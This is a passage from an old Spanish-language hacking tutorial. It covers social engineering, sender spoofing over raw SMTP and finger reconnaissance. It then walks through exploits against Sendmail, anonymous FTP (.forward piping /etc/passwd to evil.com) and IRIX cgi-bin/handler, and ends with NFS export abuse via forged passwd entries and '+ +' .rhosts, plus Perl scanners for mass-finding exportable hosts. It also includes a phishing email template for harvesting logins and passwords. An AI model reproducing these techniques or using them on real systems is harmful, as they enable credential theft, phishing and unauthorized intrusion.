4.2.- INGENIERIA
SOCIAL
Bien, este no es un metodo de hack en el sentido que todos pensais... no tiene nada que ver con informatica ni con ordenadores ni tcp/ip ni unix ni nada de eso sino que simplemente consiste en ser un poco picaro ;o).
La ingenieria social se basa en que hay mucha gente por ahi que tiene una cuenta (tanto de un proveedor de internet como una shell) y que no esta muy alerta jeje. En fin, como os comento hay varios metodos para obtener cuentas usando ingenieria social, aqui simplemente cuento algunos para que os hagais una idea pero cada uno que piense y su imaginacion le dara algunos truquillos mas.
En fin, el metodo e-mail es el mas importante por el que sera el que mas desarrollaremos en este texto aunque tambien se podria hacer por telefono. La idea es sencilla.. enviar un mail (anonimo) a alguien para que te de el login y el password. Parece dificil que traguen, no?.. pues os puedo asegurar que no lo es. }-)
Simplemente envia un mail de este estilo:
Estimado señor Lopez: (Importante conocer la identidad de la persona para darle mas confianza)
El objeto de este correo electronico es comunicarle que debido a mantener la seguridad de nuestro sistema victima.com, se requiere que envie un mail con sus datos personales y su login y su password ya que en nuestro sistema es muy importante la seguridad y deseamos mantenerla con estos chequeos rutinarios.
Agradeciendo su atencion se despide
Pepito Rodriguez
pepito@victima.com
Administrador del sistema
victima.com
Para enviar un mail para falsear el remitente, lo que se debe hacer es hacer un telnet a una maquina unix que tenga el puerto 25 abierto y dar los siguientes pasos:
Lo primero que se ha de hacer es un telnet maquinacon25.com 25, cuando te diga que ya estas conectado, has de hacer:
helo ingenieria@social.com >pleased to meet ingenieria@social.com
Tras esto has de decir quien quieres que aparezca como remitente con el comando mail from:
mail from: ingenieria@social.com
> ingenieria@social.com... Sender is valid.
Si sale esto, todo va bien..
por lo que tendras que indicar quien es el destinatario usando el comando
rcpt
rcpt to: bill@gates.com
> "bill@gates.com"... Recipient okay
Tras esto, lo que se ha de
hacer es indicar el mensaje en si con el comando data y cuando quieras
acabar pones un . en una linea.. algo asi:
data
> Enter mail, end with "." on a line by itself
Hola Bill
.
> Mail accepted
Con esto el mensaje ya esta enviado, y para cerrar la conexion has de usar quit.
> connection is closed.
En realidad con esto no se consigue un mail anonimo sino que lo que consigues es especificar el remitente que tu quieres. Para enviar mail anonimo has de usar servidores de correo anonimo o hacer este mensaje enlazando unos mails con otros.
Para saber si un servidor es anonimo has de hacer:
HELO servidor@anonimo.com
Y si cuando el servidor responde
no aparece tu IP por ningun lado, entonces es un servidor anonimo o pseudoanonimo.
Este texto puede estar mucho mas elaborado.. pero ya os servira para ver la idea y creedme este metodo funciona y por otro lado no es complicado de hacer ;o)
La pregunta ahora es... como sabemos los telefonos o los mails de la gente de victima.com???. Bien, hay varias respuestas.. muchas veces por casualidad (un vecino, un compañero de clase, etc), otras pasandotelas otro hacker ( a saber de donde vendran ¡!) y algunos metodos mas entre los que destacaria el finger. El finger es el puerto 79 y si el host victima.com lo tiene abierto, simplemente telnetealo y usando finger –l @victima.com sacaras informacion sobre la gente que esta concectada a victima.com asi como otra informacion interesante como su email. Luego puedes ir probando con finger –l nombre_usuario@victima.com con lo que obtendras aun mas informacion del sistema.
Tambien se puede hacer finger root@victima.com , guest@victima.com, etc con lo que obtendras informacion sobre ellos aunque no esten conectados.
Tambien se ha de tener en cuenta que a veces el puerto 79 esta abierto pero no te da informacion. Esto puede ser porque esta usando tcp-wrappers, pero eso es tema aparte, simplemente lo comento para que sepais que os puede pasar.
Este metodo, y usando este script, os puede hacer conseguir muchos passwords pero hay que currarselo mucho :o(. Obviamente, solo pensando un poco se te pueden ocurrir muchas mas maneras de aprovechar el finger ya que da bastante informacion sobre los usuarios aunque esta informacion cuando es realmente util es combinada con otros sistemas de ataque :)
Hay muchos mas sistemas de ingenieria social como la chica necesitada de ayuda en el irc y cosas parecidas, pero tampoco creo que valga demasiado la pena explicarlo mas. Ademas, como en todos estos temas, el unico limite es tu imaginacion :o)
Como es pesado buscar manualmente, puedes buscar maquinas con finger usando un script hecho en shell y usando listas de hosts como las que se explicaran en el apartado de nfs.
Ademas, para los que veais que este metodo es un poco coñazo, el script este siempre es util ya que tened en cuenta que las maquinas que tengan el finger abierto son maquinas que no estan muy concienciadas por la seguridad no?.. jeje.. mejor no sigo dando ideas :o) aunque tened en cuenta que esto no siempre sera cierto ya que es posible que usen los tcp-wrappers.
Nota: El tcp-wrapper es un
programa que permite filtrar ip por los distintos puertos e indicar que
demonio o programa se ejecuta en cada uno de los puertos por lo que podeis
ver todas las aplicaciones maleficas que pueden conseguir los roots usando
este tipo de programas por lo que cuidado ahi fuera.
4.3.- CONSEGUIR
FICHERO DE PASSWD A TRAVES DE ALGUN BUG
En fin, hay muchos bugs y xploits que te permiten el acceso al fichero de passwd pero aqui voy a exponer algunos que aunque son antiguos son bastante ilustrativos (para pillar xploits nuevos, a buscar por la red ke hay muchos.. de todos modos, en los apartados de pillar root, pondre xploits modernos y que funcionan ;o).. estos los he elegido aunque sean un poco antiguos porque son bastante ilustrativos:
Sistemas: Unix's en general,
espacialmente AIX y SUNOS
Versiones: Sendmail, versiones
anteriores a la 5.57 que no esten parcheadas
tumaquina% telnet
victima.com 25
Trying X.Y.Z.A...
Connected to victima.com
Escape character is
'^]'.
220 victima.com Sendmail
5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "|/bin/mail
tu_direccion@de_correo.com < /etc/passwd"
250 "|/bin/mail tu_direccion@de_correo.com
< /etc/passwd"... Sender ok
rcpt to: loquequieras
550 loquequieras...
User unknown
data
354 Enter mail, end
with "." on a line by itself
.
250 Mail accepted
quit
Connection closed
by foreign host.
Notas:
-victima.com = nombre del
ordenador a hackear
-mimaquina = nombre de nuestro
ordenador
-Lo que aparece con un numero
delante son mensajes de nuestra victima,
el resto es lo que tienes
que escribir.
La idea de este bug, es que
usualmente, en el sendmail en la linea de mail from: pondrias pepe@uno.es
, pero sin embargo, y la gracia esta aqui, le dices que te mande el fichero
/etc/passwd. Pero os digo una cosa sinceramente, este bug no funciona casi
nunca, y si funciona, felicidades , estas en una maquina que el rOOt no
tiene ni puta idea,
Como conseguir el fichero /etc/passwd si el ftp esta mal configurado
La victima debe de tener una copia completa del fichero /etc/passwd en su ftp anonimo -ftp/etc en vez de una version reducida. Sin embargo, puedes ver que normalmente nunca aparece el fichero verdadero :( , pero el home directory de "ftp" puede ser escribible en victim.com. Esto te permite ejecutar comandos remotamente - en este caso, mandarte el archivo por mail a ti mismo - por el simple metodo de crear un archivo .forward que ejecuta un comando cuando un mail es mandado a la cuenta "ftp".
evil % cat forward_sucker_file
"|/bin/mail zen@evil.com
< /etc/passwd"
evil % ftp victim.com
Connected to victim.com
220 victim FTP server
ready.
Name (victim.com:zen):
ftp
331 Guest login ok,
send ident as password.
Password:
230 Guest login ok,
access restrictions apply.
ftp> ls -lga
200 PORT command successful.
150 ASCII data connection
for /bin/ls (192.192.192.1,1129) (0 bytes).
total 5
drwxr-xr-x 4
101 1
512 Jun 20 1991 .
drwxr-xr-x 4
101 1
512 Jun 20 1991 ..
drwxr-xr-x 2
0 1
512 Jun 20 1991 bin
drwxr-xr-x 2
0 1
512 Jun 20 1991 etc
drwxr-xr-x 3
101 1
512 Aug 22 1991 pub
226 ASCII Transfer
complete.
242 bytes received
in 0.066 seconds (3.6 Kbytes/s)
ftp> put forward_sucker_file
.forward
43 bytes sent in 0.0015
seconds (28 Kbytes/s)
ftp> quit
evil % echo test |
mail ftp@victim.com
Ahora simplemente tienes
que esperar a que el fichero de passwords te sea
enviado.
Ejecutar comandos de manera remota en Irix con cgi-bin/handler
El cgi-bin/handler en los sistemas IRIX permite la lectura y escritura de ficheros. Sin embargo existe un bug que da paso a la ejecucion remota de comandos. El sistema intentara abrir el fichero (taluego_Lucas) y si no existe dara un mensaje de error para a continuacion ejecutar el comando que sigue. Muy importante, el espacio entre el comando cat y su argumento es un *tabulador* (TAB), no se admiten espacios asi que aunque podeis poner otro comando que no sea cat no podreis poner ningun comando que requiera espacios.
$ telnet victima.com 80
$ GET /cgi-bin/handler/taluego_Lucas;cat /etc/passwd|?data=Download
$ HTTP/1.0
En IRIX 6.3 se intento arreglar
esto pero lo unico que se consiguio fue que el
formato del bug pase a ser:
$telnet victima.com 80
$GET /cgi-bin/handler/whatever;cat /etc/passwd|
?data=Download
$HTTP/1.0
Con un nuevo TAB para "engañar"
al script PERL.
Hay muchos mas, pero no me
apetece seguir buscando.. quiza para posteriores ediciones...ademas en
esta categoria tambien entra el PHF que esta explicado mas adelante.
4.4.- MOUNT
Este no es un bug, sino un defecto de configuracion del NFS. Aqui voy a intentar explicarlo extensamente para que sepais lo que estais haciendo:
El NFS (Network File System) es un sistema de red que permite que una maquina servidor pueda hacer disponibles sistemas de archivos y dispositivos perifericos a maquinas clientes. Asi, la maquina cliente podra montar esos directorios pudiendolos usar como si los poseyera.
Otra cosa muy distinta es lo que se pueda hacer con los ficheros incluidos en dichos directorios (si se pueden borrar, modificar, alterar los permisos, etc), lo cual depende de la configuracion del NFS. En realidad, no es dificil configurar el NFS para que no pueda haber problemas de seguridad, usando las opciones ro y rw en la configuracion que indican que clientes tienen acceso de lectura y escritura respectivamente. Por tanto, los problemas aparecen cuando no han sido utlidas estas opciones correctamente y cualquier usuario remoto puede leer y escribir... gracias a dios hay root que dan facilidades :o)
Mount es el comando en unix que permite montar archivos en tu maquina para conseguir el objetivo expuesto anteriormente.
Para ver si una maquina remota con NFS tiene files montables se hace siendo root en la maquina donde estas usando el comando showmount. Este comando se utiliza para determinar que sistema ha montado un sistema de archivos desde un sistema dado. Con el parametro –a muestra todos los sistemas de archivos que se han montado desde el nodo servidor mientras que el comando –e muestra la lista de todos los sistemas de archivos exportados.
Como root, has de ejecutar en tu maquina:
$root> showmount –e hostvictima.com
mount clntudp_create: RPC:
Port mapper failure - RPC: Unable to receive
Si la respuesta es algo de este estilo... quiere decir que no ha habido suerte :o(
$root> showmount -e otra.net
Export list for otra.net:
/var/mail
makina1.otra.net
/home/user1
makina1.otra.net
/usr/local
pluto.seva.net,rover.seva.net
/export/X11R6.3
makina2.otra.net
/export/rover
makina1.otra.net,makina2.otra.net
En esta maquina no hay accesos del tipo everyone que sean interesantes :o( .. bueno con otras tecnicas mas avanzadas si.. pero no son el objeto de este texto ;o)
Seguimos buscando hasta que encontremos una maquina victim.com que nos ponga algo del tipo
/home (everyone)
o
/ (everyone)
BINGO!!!!!
Una vez pillemos una makina de estas caracteristicas, se pueden hacer muchas cosas pero voy a explicar el metodo tipico expuesto en los textos de hacking aunque pensando un poko se te pueden okurrir otros :)
Lo que vamos a hacer es crear una cuenta rapper (rapper es el nombre de un usuario de la maquina remota.. para cada caso sera uno distinto) en nuestro fichero de passwd local ( es decir, el de nuestra maquina) y luego como usuario rapper ( cambiamos a ese usuario con el su) pondremos una entra .rhosts en su directorio home para poder hacer un rlogin sin password.
Primero, creamos el directorio donde lo vamos a montar
mimaquina:~>mkdir /tmp/mount
mimaquina:~>mount -nt nfs
victim.com:/home /tmp/mount/
y con esto ya tendremos montado el directorio de la maquina remota en nuestra maquina local con lo que haciendo un ls en /tmp/mount veremos todos sus archivos :o)
mimaquina:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x
8 root root
1024 Jul 4 20:34 ./
1 drwxr-xr-x
19 root root
1024 Oct 8 13:42 ../
1 drwxr-xr-x
3 at1 users
1024 Jun 22 19:18 at1/
1 dr-xr-xr-x
8 ftp wheel
1024 Jul 12 14:20 ftp/
1 drwxrx-r-x
3 john 100
1024 Jul 6 13:42 john/
1 drwxrx-r-x
3 139 100
1024 Sep 15 12:24 paul/
1 -rw-------
1 root root
242 Mar 9 1997 sudoers
1 drwx------
3 test 100
1024 Oct 8 21:05 test/
1 drwx------
15 102 100
1024 Oct 20 18:57 rapper/
Vemos que hay un usuario llamado rapper cuyo UID (User Identification) es 102 por lo que lo tendremos que incluir en el /etc/passwd de nuestra maquina:
mimaquina:~>echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd
mimaquina:~>su - rapper
Welcome to rapper's user.
mimaquina:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x
8 root root
1024 Jul 4 20:34 ./
1 drwxr-xr-x
19 root root
1024 Oct 8 13:42 ../
1 drwxr-xr-x
3 at1 users
1024 Jun 22 19:18 at1/
1 dr-xr-xr-x
8 ftp wheel
1024 Jul 12 14:20 ftp/
1 drwxrx-r-x
3 john 100
1024 Jul 6 13:42 john/
1 drwxrx-r-x
3 139 100
1024 Sep 15 12:24 paul/
1 -rw-------
1 root root
242 Mar 9 1997 sudoers
1 drwx------
3 test 100
1024 Oct 8 21:05 test/
1 drwx------
15 rapper daemon 1024 Oct
20 18:57 rapper/
Asi, poseemos el directorio de rapper por lo que podemos usar las propiedades del .rhosts ( escribimos + + en su .rhosts y luego hacemos un rlogin):
mimaquina:~>echo "+ +" >
rapper/.rhosts
mimaquina:~>cd /
mimaquina:~>rlogin –l rapper
victima.com
Welcome to Victima.Com.
SunOs ver....(crap).
victima:~$
y ya tienes una cuenta en el sistema ¡!
Para desmontar el archivo, sal de este directorio y ejecuta:
mimaquina:~> umount /tmp/mount
Tened en cuenta que para
este metodo, hemos de tener acceso a la maquina por rlogin, asi que si
no es el caso, este metodo tambien admite otras posibilidades pero eso
se deja para otro texto :)
Como lo mas coñazo
de este metodo es buscar maquinas con ficheros exportables, a continuacion
expongo un script escrito por Invisble Evil en perl que te permite buscar
automaticamente. Para usarlo previamente se han de conseguir listas de
maquinas que se pueden obtener usando el host –l nombredominio > salida
y luego usando un script para obtener los ip del fichero salida o se pueden
obtener listas de maquinas que hay en internic (se obtienen por ftp de
rs.internic.net) y que son listas de maquinas con esa extension:
com.zone.gz
edu.zone.gz
gov.zone.gz
mil.zone.gz
net.zone.gz
org.zone.gz
cuando tengas estos files bajados y tras hacer un gunzip, tendras que ejecutar el script en perl:
"perl getdomain.pl com.zone
com >com.all"
perl getdomain.pl edu.zone
edu >edu.all
Y asi con todos, obteniendo ficheros com.all, edu.all y sucesivamente donde tendras la lista de maquinas.
getdomain.pl
---- cut here
#!/usr/bin/perl
# GetDomain By Nfin8 / Invisible
Evil
# Questions /msg i-e
or /msg i^e
#
# Retrieve command line
arguments.
my($inputfile, $domain)
= @ARGV;
usage() if (!defined($inputfile)
|| !defined($domain));
# Open and preprocess the
input file.
open(INFILE, "<$inputfile")
or die("Cannot open file $inputfile for reading!\n");
my(@lines) = <INFILE>;
# Initialize main data structure.
my(%hash) = {};
my($key) = "";
foreach (@lines) {
$key = (split(/\
/))[0];
chop($key);
next if ((($key =~
tr/.//) < 1) ||
(uc($domain) ne uc(((split(/\./, $key))[-1]))) ||
($key =~ m/root-server/i));
$hash{$key}++;
}
# Close input file and output
data structure to STDOUT.
close(INFILE);
foreach (sort(keys(%hash)))
{
print "$_\n";
}
sub usage {
print("\n\ngetdomain:\n");
print("Usage: getdomain
[inputfile] [search]\n\n");
print("Where [search]
is one of \'com\', \'edu\', \'gov\', \'mil\' or \'net\'.\n\n");
exit(0);
}
0;
---- cut here - end of script
-----
Tras obtener la lista de maquinas usando el anterior script (edu.all, com.all, etc..), se ha de usar el script que se expone a continuacion para obtener los resultados del showmount –e:
En cada dominio, este script
busca si hay discos montables y guarda la info en el directorio actual
en ficheros llamados domain.XXX.export... asi solo tienes que ver estos
logs y mirar si ha habido suerte !!!!
--------------- start of
cmount.pl
#/usr/bin/perl -w
#
# Check NFS exports of hosts
listed in file.
# (Hosts are listed, once
per line with no additional whitespaces.)
#
# ii@dormroom.pyro.net -
2/27/97.
# Assign null list to @URLs
which will be added to later.
my(@result) = ();
my(@domains) = ();
my($program) = "showmount
-e ";
# Pull off filename from
commandline. If it isn't defined, then assign default.
my($DomainFilename) = shift;
$DomainFilename = "domains"
if !defined($DomainFilename);
# Do checking on input.
die("mountDomains: $DomainFilename
is a directory.\n") if (-d $DomainFilename);
# Open $DomainFilename.
open(DOMAINFILE, $DomainFilename)
or
die("mountDomains:
Cannot open $DomainFilename for input.\n");
while (<DOMAINFILE>)
{
chomp($_);
print "Now checking:
$_";
# Note difference
in program output capture from "geturl.pl".
open (EXECFILE, "$program
$_ |");
@execResult = <EXECFILE>;
next if (!defined($execResult[0]));
if ($execResult[0]
=~ /^Export/) {
print
" - Export list saved.";
open
(OUTFILE, ">$_.export");
foreach
(@execResult) {
print OUTFILE;
}
close
(OUTFILE);
}
close(EXECFILE);
print "\n";
}
# We are done. Close all
files and end the program.
close (DOMAINFILE);
0;
----------------- end of
cmount.pl
Una nota final a todo este
coñazo, lo pongo aqui para que solo lo lean los que se leen los
textos enteros (jeje) es que /export/foo es el home directory del usuario
guest por lo que aunque no nos dejen exportar el directorio /home, en caso
de que nos dejen exportar el directorio /export, se podra aplicar este
mismo metodo pero teniendo en cuenta de que en lugar de usar el usuario
rapper se usara el usuario guest
suerte ahi fuera......